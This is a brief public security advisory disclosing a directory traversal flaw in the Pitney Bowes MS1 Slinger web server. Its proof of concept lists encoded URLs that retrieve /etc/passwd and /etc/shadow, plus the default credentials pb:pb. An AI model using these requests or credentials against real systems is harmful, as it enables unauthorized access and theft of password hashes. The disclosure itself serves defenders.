We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and Twitter, we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure, and we also believe that if you sell security services, you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious, it also exposes weak default credentials, which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb